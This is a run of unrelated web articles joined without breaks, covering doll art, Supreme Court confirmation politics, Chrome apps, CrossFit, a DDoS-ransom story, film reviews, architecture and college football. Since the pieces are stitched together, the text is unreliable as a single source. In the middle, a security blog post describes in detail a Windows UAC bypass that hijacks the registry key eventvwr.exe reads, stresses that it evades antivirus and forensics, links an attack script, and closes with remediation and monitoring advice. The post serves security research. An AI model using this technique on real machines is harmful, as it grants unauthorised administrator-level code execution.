Note: This doll recently sold on ebay. Link below:FOR MORE OF MY ART, PLEASE VISIT MY WEB SITE AT WWW. NCRUZ.COM . Link below:OR CHECK MY WORK OUT ON FACEBOOK AT:In celebration of the upcoming Halloween season, I am very excited to present my latest custom face up - Rick Genest aka Zombie Boy. Zombie Boy rose to fame for his heavily tattooed body as a statement of art showing the human body as a decomposing corpse. He was also a featured character in Lady Gaga's "Born This Way" music video.I use Tonner Doll Company's factory produced Zombie Boy doll. The inset photo at the bottom right shows the doll in its original factory state.As with all my creations, I completely strip the original factory paint on each of the dolls, and completely repaint the facial features in, paying attention to accuracy of likeness and lifelike expressions.Repaint is a new form of pop art, wherein the doll's face is treated like a three dimensional canvas, with the added challenge of painting within a very small area . Since dolls are basically miniature pieces, brush strokes and shading have to be very controlled and precise.-- acrylic paint and ultra fine brushes(Note: I am not in any way affiliated with the Tonner company)
Elena Kagan's confirmation hearings are underway in the Senate Judiciary Committee, a rite of passage for Supreme Court nominees. Right? Not so fast. There's actually no constitutional or legal requirement that nominees to the Supreme Court testify before the Senate.
The Constitution merely states that the president “shall nominate, and by and with the Advice and Consent of the Senate, shall appoint . . . Judges of the Supreme Court.” The first confirmation hearings were held in 1925, a voluntary gesture by President Coolidge's nominee, attorney Harlan Fiske Stone. Before then, nominees were often confirmed quickly, as quickly as the same day in the case of President Harding's nominee in 1922, Sen. George Sutherland of Utah.
History and the debates of our Founders offer some sound reasons why any vetting of court nominees should become more limited and less political. Senators should consider nominees for their general fitness for the court, not pressure them for ideological confessions.
Last week, nearly 11,000 of Kagan's e-mails were made public as part of an unprecedented release of nominee records, and for months both parties have been scouring her past to get ready for this week's hearings. Still, no real surprises are expected. Republican senators want to corner Kagan as a liberal wishing to make law from the bench, while Democratic senators will portray Kagan as a consensus builder and an “empathic” counterweight to the conservative block on the court. Still, the show must go on.
Elena Kagan is the first nominee since William Rehnquist, nominated in 1971, who has never served as a judge. The resulting lack of judicial opinions by Kagan makes it even more difficult for those trying to ascertain her ideology, so there are calls for Kagan to answer questions about her opinions on issues likely to come before the court. The Founding Fathers did not think this wise.
In his Virginia Plan, the basis for debates at the Constitutional Convention of 1787, James Madison proposed that Congress be given the power to write laws, but that then a joint “council of revision,” made up from the executive and the judicial branches, be allowed to review the laws. Many delegates supported the idea out of fear that without the support of the judicial branch the president would not have the “firmness” to stand against attempts by Congress to expand its power.
Sorry, there are no polls available at the moment.While Madison's proposal was not accepted, the council of revision debates reveal why many of the Founders thought judges should not be asked about legal issues not yet formally presented for review in court. John Rutledge, later a Supreme Court justice himself, expressed the view that members of the judiciary should never be asked “to give their opinion on a law till it comes before them.” He, like other delegates, argued that any involvement in lawmaking or any pronouncement of prior opinions could jeopardize a judge's ability to evaluate an issue fairly when it was brought before his court.
The Constitution gives the president the power to nominate judges for the Supreme Court. A majority Senate vote is required to confirm the nominee. The president can nominate whomever he chooses, and historically many have chosen friends and confidants.
With the expanding influence of the court in everyday life since the early 1900s — from social issues to credit card regulation — presidents have increasingly selected nominees reflecting their own views on the role of government. More recently they have selected nominees who can simply be confirmed.
Today's elaborate, partisan confirmation hearings make a nominee's fate more a test of presidential power than an opportunity to send the best candidate to our highest court. Alexander Hamilton's assurances in the Federalist Papers that only the most highly qualified individuals would serve as federal judges are increasingly in jeopardy.
Agreeing upon a definition of “highly qualified” for the Supreme Court would be difficult for members of the highly partisan Senate, but even that debate would prove more fruitful than trying to read a nominee's ideological tea leaves. (The American Bar Association evaluates nominees, and it deemed Kagan “highly qualified.”)
During his 2005 confirmation hearings, Chief Justice John Roberts avoided any specific opinions and instead gave his conciliatory “umpire speech” about justices needing to leave their ideologies out of decisions. Yet he has issued some surprisingly activist opinions.
Combine the Senate's weak record of drawing any substantive ideological matter from nominees with the concerns of prejudice raised by the Founders, and we can see what's wrong with Kagan's confirmation hearings before they start.
Kagan herself has said that confirmation hearings should be more straightforward. They should be — but by developing the record of a nominee's character and legal acumen, rather than by chasing ideological clues and highlighting political postures.
Kathleen Gronnerud
Kathleen Gronnerud is a writer/historian specializing in the Constitutional Convention and the presidency who writes for the History News Service. E-mail: kgronnerud@yahoo.com.
Republished with permission from the History News Network.
The Senate keeps a running online tally of every floor vote, and looking over this year's list , the word “confirmed” is popping up quite a bit more than it used to. Take last night , for example.
The Senate on Monday evening confirmed Jeh C. Johnson as President Obama's secretary of homeland security. Mr. Johnson's nomination was held up in the Senate fight over filibusters. In the end, however, his appointment was approved, 78 to 16, after the relaxed filibuster rules forced by the Democrats allowed a final vote.
On the vote to end debate on Johnson's nomination, there were 57 votes – a majority of the Senate, but not enough to end a filibuster. But thanks to the so-called “nuclear option,” filibusters on executive-branch nominees are a thing of the past; 57 votes was more than enough to end debate; and Johnson was confirmed to lead DHS easily.
And while President Obama is no doubt pleased to see the restoration of the traditional Senate confirmation process, it's striking to see just how much progress there's been in Congress' upper chamber as a result of the recent rules change. As Rachel noted on the show last night, not only was Johnson approved, but so too was Anne Patterson, Obama's nominee to be an Assistant Secretary of State.
On Friday of last week, two other executive-branch nominees were confirmed on up-or-down votes. The day before, several judicial nominees were also approved. All told, the Senate has confirmed 13 executive-branch and judicial nominees in just 7 days. How many of them would have been delayed or blocked by Republican obstructionism under the old filibuster rules? According to a Democratic Senate source, all 13.
In other words, by restoring majority rule to the Senate confirmation process, the “nuclear option” has made it possible for the chamber to be efficient and productive again. Maybe Democrats should have done this sooner.
What's more, the progress is just a hint of what's to come – Senate Majority Leader Harry Reid (D-Nev.) has slated 10 more nominees, include Fed Chair nominee Janet Yellen , for floor votes before the chamber breaks for the holidays. There may not be time for votes on all 10, but without the “nuclear option,” it's likely we wouldn't see votes on any of them this year.
For their part, Senate Republicans, whose unprecedented abuse of Senate rules created the need for the recent rules change, still aren't happy about the restoration of majority rule. The Hill reports that the minority party “will use their private caucus lunch Tuesday to decide on their strategy for holding back a string of nominees.”
Who needs Windows? Soon, you'll be able to use Chrome-based standalone apps to communicate with a Fitbit, sort through an iTunes music library, and pay for in-app purchases via Google Wallet. Google recently announced a slew of updates and additions to the APIs (application programming interfaces) available to developers making packaged apps for Google's browser.
You may not have heard of packaged apps, as they're currently still in the development stages. Packaged apps are built on top of Chrome using Web technologies such as HTML, CSS, and JavaScript. The big difference between packaged apps and regular Chrome apps is that packaged apps are standalone programs that operate in a separate window and can—crucially—run offline. They are also stripped of all the typical browser “chrome” such as the URL address bar and tabs, to more closely resemble a typical PC application.
The developer preview of Chrome's packaged app launcher running in Windows.
Packaged apps will give Google the ability to invade the traditional desktop with its own selection of Chrome-based apps that aren't dependent specifically on Linux, OS X, or Windows.
Taking the online offline with new features
Google has been steadily working on improving the functionality of packaged apps as it gets the feature ready for a primetime release. Some of big new features tipped by Google on Monday include the ability for packaged apps to communicate with Bluetooth devices using the 4.0 spec. Chrome's new Bluetooth support includes the ability to talk to low energy devices like fitness bands and heart rate sensors.
Packaged apps can now also offer in-app payments using Google Wallet. First tipped off in May when it appeared in the Canary early build of Chrome, in-app payments will make it easier to sell virtual goods in games or allow users to quickly upgrade to an app's paid services.
A new change to the media gallery API adds your PC's iTunes music library as a default source for importing and playing music in a packaged app. It's a little surprising the media gallery API didn't include the iTunes folder as a default choice from the get-go considering that most media apps automatically scour the iTunes library for music. Since the media gallery API needs to read content from personal files on a PC, the apps using this feature will be required to ask for user permission before proceeding.
Beyond support for Bluetooth, the iTunes music library, and in-app payments, there are also a few important but not-so-exciting additions. OAuth 2.0 support will let you sign in to packaged apps using your Google account or third-party accounts that support OAuth 2.0, such as Github and Foursquare. The analytics API will let developers collect bulk, anonymous information about how people use their apps, and the native messaging API will let packaged apps access device hardware such as sensors.
Unfortunately, packaged apps aren't quite ready for the masses yet. For now, they're only available to users on Chrome's developer channel, though their appearance in the dev channel signals that a public release is likely coming sometime in the near future.
The 2014 Reebok CrossFit Invitational, presented by HGST, took place on Sunday, Nov. 9, at the SAP Center in San Jose, California. In the third year of Invitational competition, all-star teams from the United States, Australia, Europe and Canada fought for the championship through five events.
Each year, the CrossFit Invitational invites the best individual athletes from around the globe to prove their fitness as part of a team, testing their communication skills as well as their fitness.
Last year, Team World emerged victorious in Berlin, Germany, after a tough fight with Team USA. The unanticipated loss left then-three-time CrossFit Games champ Rich Froning—a man unfamiliar with losing—hungry for redemption.
This year, teams were stacked with past and current CrossFit Games champions, as well as Games veterans and promising rookies, making the Invitational completely unpredictable. Everything came down to the final test of the two-hour competition.
After four events, which included synchronized muscle-ups, deadlift holds, 1-rep-max snatches and more, the teams were up against handstand walks, legless rope climbs, 950-lb. tire flips and work with the infamous Worm in Event 5.
Coached by seven-time Games athlete Becca Voigt, USA Team dominated the final event from the start to come from behind in the overall standings and take the win. Now known as the “Team of Champions,” the foursome finished out the competition strong, lunging the Worm to victory and bringing the title back to American soil for the second time in Invitational history.
Video by Marston Sawyers.
26min 27sec
Additional audio: CrossFit Radio Episode 302 by Justin Judkins, published Nov. 2, 2013.
Sen. Rand Paul Randal (Rand) Howard PaulThe Hill's Morning Report — Emergency declaration to test GOP loyalty to Trump The Hill's 12:30 Report: Trump escalates fight with NY Times The 10 GOP senators who may break with Trump on emergency MORE (R-Ky.) said the similarities between retired Gen. David Petraeus's mishandling of classified information and Hillary Clinton Hillary Diane Rodham ClintonSanders: 'I fully expect' fair treatment by DNC in 2020 after 'not quite even handed' 2016 primary Sanders: 'Damn right' I'll make the large corporations pay 'fair share of taxes' Former Sanders campaign spokesman: Clinton staff are 'biggest a--holes in American politics' MORE's use of a private email server could be a "potential problem" as Petraeus is considered for a Cabinet post.
ADVERTISEMENT
Trump is reportedly considering the former CIA director to be secretary of State and said after a meeting on Monday that he was "impressed." He's also expected to meet with another potential contender, Sen. Bob Corker Robert (Bob) Phillips CorkerBrexit and exit: A transatlantic comparison Sasse's jabs at Trump spark talk of primary challenger RNC votes to give Trump 'undivided support' ahead of 2020 MORE (R-Tenn.), this week.
“I think the problem they're going to have putting forward is there are a lot of similarities to Hillary Clinton as far as revealing classified information,” Paul told CNN's Wolf Blitzer in a Monday interview.
“They spent a year and a half beating up Hillary Clinton over revealing classified information and then they would appoint somebody who the FBI says not only revealed it, but then lied about it in an interview and purposefully gave it to someone who did not have the clearance to have that.”
Petraeus reached a deal last year with the Department of Justice that included pleading guilty to unauthorized removal of classified material and paying a fine.
While on the campaign trail, Trump frequently compared Petraeus's mishandling of classified information as CIA director to that of Clinton, who has been heavily scrutinized for using a private email server when she was secretary of State.
Doug Stafford, Paul's chief strategist, also signaled Monday that Petraeus' previous admission that he gave classified information to a woman he was having affair with while he was CIA director should disqualify him.
Following the outage of the Sony PlayStation Network and Microsoft Xbox Live networks on Thursday, for which hacker group Lizard Squad took credit, Internet tycoon and founder of Mega, Kim Dotcom, took to Twitter to try and strike a deal.
If Lizard Squad (@LizardMafia on Twitter) was actually behind the disruption, which it claims to be a DDoS attack, then it appears that Dotcom was successful in his endeavour.
Kim Dotcom offered Lizard Squad 3,000 premium Mega Lifetime vouchers for stopping the attack. Dotcom initiated the conversation with "Hi @LizardMafia, I want to play #Destiny on XBOX Live. I'll give your entire crew Mega lifetime premium vouchers if you let us play. Cool?"
Hi @LizardMafia, I want to play #Destiny on XBOX Live. I'll give your entire crew Mega lifetime premium vouchers if you let us play. Cool? -- Kim Dotcom (@KimDotcom) December 25, 2014
Dotcom further tweeted and asked the Mega management to "approve 3000 @MegaPrivacy premium vouchers for @LizardMafia if they stop attacking XBOX Live and PSN immediately." He also posted the conversation thread between him and Lizard Squad agreeing to the deal and tweeted "A Christmas Miracle. How @MEGAprivacy saved @Xbox & @PlayStation from the @LizardMafia attack. Enjoy your games! :-)".
Asking Mega management to approve 3000 @MegaPrivacy premium vouchers for @LizardMafia if they stop attacking XBOX Live and PSN immediately. -- Kim Dotcom (@KimDotcom) December 26, 2014
After the transaction was done, Lizard Squad claimed it had stopped the attacks and tweeted "Thanks @KimDotcom for the vouchers-you're the reason we stopped the attacks. @MegaPrivacy is an awesome service." The hacker group added that they stopped the attacks nearly 2 hours ago and "the current downtime is just the aftermath."
Thanks @KimDotcom for the vouchers--you're the reason we stopped the attacks. @MegaPrivacy is an awesome service. -- Lizard Squad (@LizardMafia) December 26, 2014
Attacks were stopped around 2 hours ago, the current downtime is just the aftermath. -- Lizard Squad (@LizardMafia) December 26, 2014
After seemingly getting results with his method, Dotcom tweeted "Obviously, diplomacy works. I recommend that the U.S. Government gives it a try. #MakeLoveNotWar #UseMegaVouchers." He also specified that the offer for free Mega premium accounts would be revoked if the hacker group attacked PSN and Xbox Live again - the private conversation thread between Lizard Squad and Kim Dotcom also reveals the accounts would be converted into Lifetime accounts only if the networks are left alone. "Remember... Lizard Squad only gets the benefit of free Mega premium accounts if they don't attack Xbox Live & PSN again. #ThatsTheDeal"
Obviously, diplomacy works. I recommend that the U.S. Government gives it a try. #MakeLoveNotWar #UseMegaVouchers -- Kim Dotcom (@KimDotcom) December 26, 2014
Remember... Lizard Squad only gets the benefit of free Mega premium accounts if they don't attack Xbox Live & PSN again. #ThatsTheDeal -- Kim Dotcom (@KimDotcom) December 26, 2014
Both the game networks should soon be accessible as Lizard Squad claims the attacks have now stopped. However, at the time of writing, only the Xbox Live service was up and running (status page), with Sony's status page for PSN showing the service was still offline.
Apart from sharing the private conversation thread, Dotcom took further credit for the resumption of services in a tweet, saying, "Xbox Live and PSN services coming back. Many regions fully restored. Full recovery imminent. Enjoy your gaming holidays. You're welcome :-)". He apparently also received a lot of messages on his Xbox Live account once services resumed, and modestly asked people to stop. "Wow my MEGARACER account is getting spammed with 'Thank you' messages on Xbox Live. STOP! Haha I'm happy you're happy!"
Xbox Live and PSN services coming back. Many regions fully restored. Full recovery imminent. Enjoy your gaming holidays. You're welcome :-) -- Kim Dotcom (@KimDotcom) December 26, 2014
Wow my MEGARACER account is getting spammed with 'Thank you' messages on Xbox Live. STOP! HahaI'm happy you're happy! -- Kim Dotcom (@KimDotcom) December 26, 2014
Reports speculate that the attack on the gaming networks of Sony and Microsoft was a retaliation for airing the controversial movie The Interview, the former on its own seetheinterview.com site, and the latter on Xbox Video. Though it seems this is not the case based on Lizard Squad's tweets, which indicate the group seems to prefer Nintendo.
After digging into Windows 10 and discovering a rather interesting method for bypassing user account control, I decided to spend a little more time investigating other potential techniques for getting around UAC. Currently, there are a couple of public UAC bypass techniques, most of which require a privileged file copy using the IFileOperation COM object or WUSA extraction (Windows 7) to take advantage of a DLL hijack in a protected system location. All of these techniques require dropping a file to disk (for example, placing a DLL on disk to perform a DLL hijack). You can take a look at some of these public techniques here (by @hfiref0x). The technique covered in this post differs from the other public methods and provides a useful new technique that does not rely on a privileged file copy, code injection, or placing a traditional file on disk (such as a DLL). This technique has been tested on Windows 7 and Windows 10, but is expected to work on all versions of Windows that implement UAC.
As I mentioned in my last post on bypassing UAC using Disk Cleanup, a common technique used to investigate loading behavior on Windows is to use SysInternals Process Monitor to analyze how a process behaves when executed. While digging into the Windows Event Log with ProcMon opened, I noticed that eventvwr.exe was executing some registry queries against the HKEY_CURRENT_USER hive as a high integrity process.
Before diving in too far, it is important to understand what the HKEY_CLASSES_ROOT (HKCR) and HKEY_CURRENT_USER (HKCU) registry hives are and how they interact. The HKCR hive is simply a combination of HKLM:\Software\Classes and HKCU:\Software\Classes. You can read more about HKCR and why the HKLM and HKCU hives are merged here. Since these hives are merged, you can often hijack keys in HKCR:\ by creating them in HKCU:\Software\Classes. Since this relationship exists between these 2 hives, any elevated process that interacts with both HKCU and HKCR in succession are particularly interesting since you are able to tamper with values in HKCU. As a normal user, you have write access to keys in HKCU; if an elevated process interacts with keys you are able to manipulate, you can potentially interfere with actions a high-integrity process is attempting to perform.
Now, as some of you may know, there are some Microsoft signed binaries that auto-elevate due to their manifest. You can read more about these binaries and the manifests here. By using the SysInternals tool “sigcheck”, I verified that “eventvwr.exe” auto-elevates due to its manifest:
While digging deeper into the ProcMon output, I noticed that “eventvwr.exe” was interacting with HKCU\Software\Classes\mscfile\shell\open\command, which resulted in a “NAME NOT FOUND” result. Shortly after, eventvwr.exe was seen interacting with the key HKCR\mscfile\shell\open\command. Looking at HKCR\mscfile\shell\open\command, I noticed that the default value was set to call mmc.exe (Microsoft Management Console), the program responsible for loading Management Snap-Ins:
As mentioned above, calls to HKEY_CURRENT_USER (or HKCU) from a high integrity process are particularly interesting. This often means that an elevated process is somehow interacting with a registry location that a medium integrity process can tamper with. In this case, it was observed that “eventvwr.exe” was querying HKCU\Software\Classes\mscfile\shell\open\command before HKCR\mscfile\shell\open\command. Since the HKCU value returned with “NAME NOT FOUND”, the elevated process queried the HKCR location:
From the output, it appears that “eventvwr.exe”, as a high integrity process, queries both HKCU and HKCR registry hives to start mmc.exe. After mmc.exe starts, it opens eventvwr.msc, which is a Microsoft Saved Console file, causing the Event Viewer to be displayed. This makes sense due to the fact that the Microsoft Management Console (mmc.exe) loads Microsoft Saved Console files (.msc). You can read more about the Microsoft Management Console and the corresponding Microsoft Saved Console files here.
With this information, I decided to create the registry structure needed for “eventvwr.exe” to successfully query the HKCU location instead of the HKCR location. Since the (Default) value located in HKCR\mscfile\shell\open\command contained an executable, I decided to simply replace the executable with powershell.exe:
When starting “eventvwr.exe”, I noticed that is successfully queried/opened HKCU\Software\Classes\mscfile\shell\open\command:
This action effectively replaced the expected “mmc.exe” value with our new value: “powershell.exe”. As the process continued, I observed that it ended up starting “powershell.exe” instead of “mmc.exe”:
Looking at Process Explorer, I was able to confirm that powershell.exe was indeed running as high integrity:
Due to the fact that I was able to hijack the process being started, it is possible to simply execute whatever malicious PowerShell script/command you wish. This means that code execution has been achieved in a high integrity process (bypassing UAC) without dropping a DLL or other file down to the file system. This significantly reduces the risk to the attacker because they aren't placing a traditional file on the file system that can be caught by AV/HIPS or forensically identified later.
To demonstrate this attack, Matt Graeber (@mattifestation) and I constructed a PowerShell script that, when executed on a system, will create the required registry entry in the current user's hive (HKCU\Software\Classes\mscfile\shell\open\command), set the default value to whatever you pass via the -Command parameter, run “eventvwr.exe” and then clean up the registry entry.
You can find the script here: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
Within the script, we have provided an example command. This particular command uses PowerShell to write out “Is Elevated: True” to C:\UACBypassTest. This will demonstrate that the command has executed has a high integrity process due to the fact that “Is Elevated” equated to “True” and the text file it outputs is being written to a directory that a medium integrity process is not allowed to write to.
This technique differs from the other public techniques by having a few handy benefits:
This technique does not require dropping a traditional file to the file system. Most (if not all) public UAC bypasses currently require dropping a file (typically a DLL) to the file system. Doing so increases the risk of the attacker getting caught. Since this technique doesn't drop a traditional file, that extra risk to the attacker is mitigated. This technique does not require any process injection, meaning the attack won't get flagged by security solutions that monitor for this type of behavior. There is no privileged file copy required. Most UAC bypasses require some sort of privileged file copy in order to get a malicious DLL into a secure location to setup a DLL hijack. Since it is possible to replace what executable “eventvwr.exe” starts to load the required Snap-in, it is possible to simply use an existing, trusted Microsoft binary to execute code in memory instead.
This particular technique can be remediated or fixed by setting the UAC level to “Always Notify” or by removing the current user from the Local Administrators group. Further, if you would like to monitor for this attack, you could utilize methods/signatures to look for and alert on new registry entries in HKCU\Software\Classes\.
One blogger can't possibly watch every single film, so thanks to two of FC contributors today, I bring you double reviews of two movies currently in theaters. This is The End is actually just been released today.
Pain and Gain
It may be hard to believe when you're watching the sordid, outrageous crimes that take place in Pain and Gain, but this film is based on a true story. The movie stars Mark Wahlberg and Dwayne Johnson, and it's about bodybuilders on a crime spree in mid-1990s Miami. Action director Michael Bay helmed this terrible low-budget film, which is more than two hours long and feels much longer.
The movie used as its source material a three-part crime series, written by reporter Pete Collins and published in Miami's “New Times” newspaper. What happens over the course of the film, in brief, is that a weightlifter named Daniel Lugo, portrayed by Wahlberg, forms the Sun Gym Gang. This murderous group includes the fictional Paul Doyle, played by Johnson, a cocaine addict and religious fundamentalist. This stripper-loving, steroid-fueled gang needs money, and so they decide to kidnap, torture and ultimately murder Victor Kershaw, a local deli owner, and later the head of a telephone sex company and his girlfriend.
What makes these criminals, in real life and in the film, especially shocking is that they hold Kershaw hostage for roughly a month, continually torturing him in order to take control of his financial assets. And what makes the movie puzzling – not to mention offensive – is the approach it takes to the story. Instead of crafting a horrific drama, Christopher Markus and Stephen McFeely, the authors of the screenplay, decided that they would try to create a quasi-comedy. The key word in that last sentence is “try,” because nothing in the movie is remotely funny. Rather, the film is infested with all kinds of crude, sophomoric jokes, including gags about bodily functions and sex toys. As a result, inevitably, several relatives of the real victims in this case have publicly denounced the movie for trivializing events and presenting the killers in a somewhat positive light, and for attempting to get laughs in the process.
In recent years, Mark Wahlberg has proven himself a talented and versatile actor, adept in both comedic and dramatic roles. Think of films as different from one another as Ted (2012), about a grown man with a living teddy bear, and The Fighter (2010), a gripping true-life account of a working-class boxer. That Wahlberg would choose to be in Pain and Gain is truly shocking.
On the other hand, that Michael Bay would direct this garbage is not shocking. He's best known for loud, witless movies such as the Transformers series. And Bay employs his entire arsenal of headache-inducing tricks throughout this picture, including super-fast edits, spinning camera moves and the objectification of his actresses' bodies. Indeed, the only real difference between the bodybuilders in “Pain and Gain” and the bad robots in “Transformers” is that, once in a while, the giant robots actually seem kind of realistic. Oh, and the Transformers don't curse or go to strip clubs.
3 out of 5 reels
Author: Eddie D. Shackleford is a writer and blogger for Cable.tv and loves to write about movies, entertainment, TV and more. You can follow Eddie @Eddie20Ford.
…
This is the End
I have to admit, I'm not a big comedy fan. I rarely seek out comedies at the cinemas, it's not that I don't like the genre, I just think some of the comedy films have been either average or just boring within the last few years. I prefer my comedies on TV, I love shows like Parks & Recreation, The League and Arrested Development. But when I saw the trailer for This Is The End, I was kind of excited to see it. A disaster and comedy film with big named stars playing themselves, how can it not be funny.
The film opens with Seth Rogen picking up his friend Jay Baruchel at the airport. They stopped at Rogen's house, drank alcohol, smoked a lot of weed and then decided to head to James Franco's house for a party he's throwing. Once there, they ran into who's who of young comedians in Hollywood. Even Emma (Hermione) Watson and Rihanna were there partying. Everyone was having a great time except Jay, since he's not as famous as the other actors at the party, he felt left out. So later he asked Seth to go to a convenient store with him to get some cigarettes. While there Jay said he wanted to leave the party and go hang out at Seth's place, but Seth wanted to stay. Then suddenly there's an earthquake and some people inside the store got sucked up to the sky by blue lights and some died; violently I have to say.
They ran back to Franco's place and told everyone what was happening, of course no one believed them, even Seth started to doubt what he saw. Then the earthquake started again and this time there's a giant sinkhole in Franco's front lawn, a bunch of people fell into it. So James Franco decided to go back into his house believing it's safer there. The people who came with him were Jonah Hill, Craig Robinson, Jay Baruchel and Seth Rogen. So most of the film took place inside Franco's house and the bicker between these actors. Later on in the film, Danny McBride showed up and he and Franco got into a fight about masturbation that will make your stomach hurt from laughing so hard, it's one of the funniest scenes in the movie. Then later on, a certain big named actor showed up and that also got a huge laugh from the audience.
I didn't expect the movie to play it so straight, I mean it's about the end of world and these actors are trying to survive it. I was hoping they would make fun of the movie industry in general, particularly the big budget tent poles that we see every summer. One thing they did do was to insult one another, a constant running gag was how Jay Baruchel is still unknown since he's not as popular as the other actors within the group. The movie kind of lost me when it started talking about the rapture and then monsters showed up to hunt down the actors. I don't want to give away too much since I think a lot of people might get a kick out of the story.
Performance-wise everyone was pretty good, especially Jay Baruchel who's basically the lead in the film. I've never seen him in anything before this movie and I thought he's funny and I can see him becoming the new Jim Carrey. Franco, Rogen, McBride, Hill and Robinson were pretty much playing themselves and most of the time it worked.
All in all, this debut feature film by Evan Goldberg (who wrote Pineapple Express, Superbad) is a decent comedy. If you're a fan of Goldberg's previous films that he wrote, as well as Shawn of the Dead, you're going to enjoy this. Just don't take your young kids or nieces or nephews to see it, the film contains graphic language and violence.
– Post by Ted S.
…
2.5 out of 5 reels
…
Have you seen either one of these films? Let us know your thoughts below in the comments!
Advertisements
The key to being a successful wedding photographer is equal parts artistic talent and good business sense. While there are countless tutorials teaching you how to shoot portraits and use lighting adequately, business sense is something a little harder to pass on. This is where Spencer Lum has stepped in with a series of tutorial videos teaching you how to talk to clients and setting the right price for your work.
The videos are just a sliver of the advice Spencer offers on his site called Ground Glass. Spencer is a seasoned wedding photographer and owner of 5 West Studios, so his tips come from years of experience and working with clients.
“Ground Glass is about the breaking down barriers and dealing with real-world business,” Spencer wrote on his site. “The top reason people fail isn't a lack of desire or effort. It's finding a course of action that specifically fits their business.”
Watch out one of Spencer's videos past the break and be sure to check out his YouTube channel and visit Ground Glass.
Via Reddit
photo © Frank Hanswijk
As the times are changing, sometimes it is of outmost importance to maintain cultural and religious elements which tell a story about a nation; sometimes it's not necessary to preserve the rituals, but the buildings that these ceremonies were once held in. It is very common nowadays, especially in the Northern countries that churches are left abandoned, this is mainly because fewer people go to services these days.
photo © Frank Hanswijk
Therefore, churches and other historic buildings are asked to be re-used and thus give a new program. Specifically, in The Netherlands there are hundreds of empty churches which have altered their function and are now given a new program, such is the case with St. Jakobus in Utrecht. The purpose of the re-use of the church was to re-evaluate this distinguished monument with as little architectural interventions as possible to transform it into a spacious residence.
photo © Frank Hanswijk
photo © Frank Hanswijk
St. Jakobus stands unobtrusively as it blends in with the surrounding topography and architectural scene. The church ceremonies and its general operation stopped in 1991; ever since and until 2007 the church was used as a showroom for antique furniture, as well as a meeting place for small concerts. According to the former use interior alterations had been made in order to support the program, such was the construction of a large mezzanine floor. The mezzanine floor was an important factor in the reconstruction process for Zecc Architects as they had to modify this construction in order to enlarge the spatial qualities in the church. The mezzanine floor was partially removed so to emphasize the interesting sightlines and allow for abundant natural light to enter to the ground floor.
photo © Frank Hanswijk
photo © Frank Hanswijk
photo © Frank Hanswijk
Beneath the altered floor rooms have been created which host the bedrooms, a study room and a bathroom. Indirect daylight is entered through voids in the floor and in the walls thus allowing for abundant natural light. The vacant spaces which have been formed act as a kind of inner patio which forms boundaries for the living areas.
photo © Frank Hanswijk
photo © Frank Hanswijk
The new and modern residential volume has been constructed in such a manner that it is completely detached from the existing church structure. This new detached structure is now regarded as a new ‘temporary' construction within this historical monument. This volume can be demolished at any given time if the residential church is to change its function. The circulation of the residence flows through the temporary volume and connects the open front with the rear of the church where the church alter once stood. In the back the kitchen is arranged, whereby the kitchen block is standing on its own, the old church pews have been reused by Zecc to create the dining table. Overall, the volume, as well as the retained fixtures and detailing have allowed for the church features to dominate within the interiors while on the other hand the fact that this church is used as a residence is stated clear.
photo © Frank Hanswijk
photo © Frank Hanswijk
photo © Frank Hanswijk
Zecc Architects modified the church as little as possible; they maintained the existing wooden floor, the stained glass windows and the old doors while they repaired whatever was necessary. The new white floor construction is kept free from the church walls, columns and arches. The sleek stucco volume is constructed from steel, wood and sheet material. Closed parapets guide sightlines and embrace the places of living. Glass surfaces in the volume constantly offer another insight of fragments in the church. Moreover, they reflect historical elements, which creates a fusion of old and new.
photo © Frank Hanswijk
photo © Frank Hanswijk
photo © Frank Hanswijk
All in all, Zecc Architects have transformed this historical building into a unique single dwelling; it is important that St. Jakobus church was not divided into smaller units which would have eventually destroyed the spaciousness as well as the layout. Furthermore, the architectural layout of this residence has been treated in such a manner so that future conversions are possible; under any new circumstance the historical St. Jakobuskerk church can easily be converted into a public building, or even be re-used as a church.
photo © Frank Hanswijk
Project: Church conversion into a residence in Utrecht
Location: Bemuurde Weerd, Utrecht – The Netherlands
Client: Private
Project Team: Zecc Architects > Marnix van der Meer, Bart Kellerhuis, René de Korte & Steven Nobel
Contractor: Rietveld interieurbouw b.v.
Furniture: Springers wonen
Program: Residential church XL
Floor area: Ca. 475 m2
Period: 2007 - 2009
It's just one weekend of football, but there were plenty of telling performances around the Southeastern Conference to open the 2014 season.
Cameron Artis-Payne had 177 rushing yards for Auburn on Saturday during a 45-21 win against Arkansas. The Tigers top the SEC power rankings this week.
With that, here are the league's power rankings based on those games.
1. Auburn- The Tigers pulled away from Arkansas in the second half for a 45-21 win Saturday after noon on the plains. Auburn has an improved passing game this season as the nation's No. 1 junior college prospect for 2014- wide receiver D'haquille Williams- caught 9 passes for 154 yards and both Jeremy Johnson and Nick Marshall were efficient. The run game isn't going anywhere either- Cameron Artis-Payne had 177 yards and a touchdown and Corey Grant had 87 yards and a touchdown on just 10 carries. Also, the Tigers' defense under veteran coordinator Ellis Johnson made good halftime adjustments to shut the Razorbacks down and break a 21-21 tie at half.
2. Georgia- In a game that was nearly identical to Auburn's, the Bulldogs pulled away late and topped Clemson, 45-21, in Athens. Who is going to stop Todd Gurley this season? And if Gurley is stopped or slowed, the Dawgs showed they have plenty of additional weapons at running back- led by true freshmen Nick Chubb and Sony Michel. As Johnson did for Auburn against the Razorbacks, first-year UGA defensive coordinator Jeremy Pruitt made excellent adjustments to keep Clemson off-balance in the second half and Georgia's defense looks improved from a season ago.
3. Alabama- Crimson Tide head coach Nick Saban seemed excited after Alabama's 33-23 win against West Virginia at the Georgia Dome- that he and his staff have some things to work on. They do. It was a good win for Alabama that could have ended in a loss as the Mountaineers' tempo offense was able to get some things going against the Tide defense and move the football. Alabama's running game was dominant with T.J. Yeldon and Derrick Henry leading the way as we expected and first-time starting quarterback Blake Sims was solid.
4. Texas A&M- Aggies quarterback Kenny Hill set a school record with 511 passing yards and three touchdowns in a 52-28 win at South Carolina on Thursday night. Texas A&M has so many weapons on offense- a great offensive line, a stable of receivers, three good backs- the question was at signal caller and Hill definitely answered those questions. He gets the ball out so quick and is extremely accurate. Looking down the road a bit, if West Virginia was able to give Alabama that much trouble, what are the Aggies going to be able to do?
5. Mississippi State- Sometimes when there is hype surrounding a team, they come out and play a little flat. That wasn't the case with the Bulldogs as they dominated Southern Miss from start to finish in a 49-0 win in Starkville. Quarterback Dak Prescott was efficient, completing 18-of-26 passes for 284 yards and four touchdowns. Granted, the Golden Eagles aren't the Golden Eagles of yore, but this was still an impressive win.
